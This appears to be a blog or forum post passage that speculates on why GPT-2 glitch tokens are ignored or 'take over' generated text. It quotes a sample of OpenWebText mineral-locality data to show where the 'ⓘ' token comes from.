Where the best way to predict the next natural language token is to ignore anything that doesn't belong in natural language, pass the information that is present in natural language tokens through the glitch tokens as though the glitch tokens aren't there, and use that information to predict further natural language tokens. This is pretty much what we observe.
I also have a hypothesis that having your vocabulary include tokens which look long and unnatural in natural language helps mitigate catastrophic forgetting. Imagine that your training data for coding include a lot of a function named "rawdownloadcloneembedreportprint". If you tokenize it as several English words, the relationship between them in natural language will begin to break down as the model encounters more coding data with that function. Tokenizing it as a single token helps prevent this.
There are also a subset of glitch tokens which tend to "take over" when encountered in natural language. They tend to occur in a context with a lot of natural language tokens, but in an unusual distribution. An example is <45563 'ⓘ' 27>[2], which was mostly present in a long list of something geology-related (list of geological surveys?). In the context of "What is the meaning of", it'll either give a vague but coherent geology-related answer, or go back to listing geological surverys. This behavior also occurs for "petertodd"/"ertodd" and crypto spam. GPT2 is able to tell that they vaguely belong in natural language, but they have such a strong influence on the following text that they often "take over". This behavior decreases as model size increases, with "ertodd" consistantly displaying this behavior on the smallest GPT2 model, but rarely on the largest.
I am now very confused why all the other talk about glitch tokens (including my own, from just a week ago!) sound so confused. This seems very simple and intuitive and I am utterly shocked I haven't seen anyone else write this exact analysis. It probably exists out there, and I just haven't seen it.
tldr; glitch tokens are ignored because they don't convery information in the use context. Information is passed through them as though they don't exist. This sounds extremely obvious in hindsight.
Glitch token classifications
In conclusion, I think we can divide glitch tokens into 3 main categories.
Future Research Plans
I'm currently using interpretability tools to identify the exact changes glitch tokens cause to generated text.
Addendum: The SCP hypothesis
Where on the internet is an "information-less" token often times present somewhere you would expect a normal (coversational) word?
That's right, SCP articles.
This might explain why a direct iterogative of " What is the nature of <glitch token>?" sometimes results in a creepy/unnerving/existential answer.
I'm only including this because it's funny, but I only give <1% probability that this has a significant effect.
I'm counting utf-8 control characters as resolved here, but those honestly need their own post.
Looks like scrapes from https://www.mindat.org/?
Example text from OpenWebText:
Lowville quartz locality Walter, M., Chamberlain, S.C. (2013) The Lowville quartz occurrence, Lewis County, NY. The 40th Rochester Mineralogical Symposium, Contributed Papers in Specimen Mineralogy, 29-30.\n\nNorth Carolina Gaston Co. ⓘ Crowders Mountain State Park Espenshade, Gilbert H. and Potter, Donald B. (1960) Kyanite,Sillimanite And Andalusite Deposits of the Southeastern States: Geological Survey Professional Paper 336\n\nOregon Lane Co. Black Butte District ⓘ Hobart Butte Am Min (1948) 33:122-134\n\nPennsylvania Schuylkill Co. New Castle Township ⓘ Wadesville Tom Loomis specimen; Alfredo Petrov specimens; Collected by James J. "Skip" Colflesh, 2007.\n\nUtah Beaver Co. San Francisco Mts ⓘ San Francisco District (Frisco District) Petersen, Erich U., (2001) Porphyry Cu-Style Mineralization Potential In The San Francisco District, Ut. GSA Annual Meeting, November 5-8, 2001\n\nJuab Co. East Tintic Mts Tintic District ⓘ Mintintic Mine American Mineralogist, Volume 30, pages 76-77\n\nⓘ White Hi', ' District NBMG Spec. Pub. 31 Minerals of Nevada\n\nNew Hampshire Ches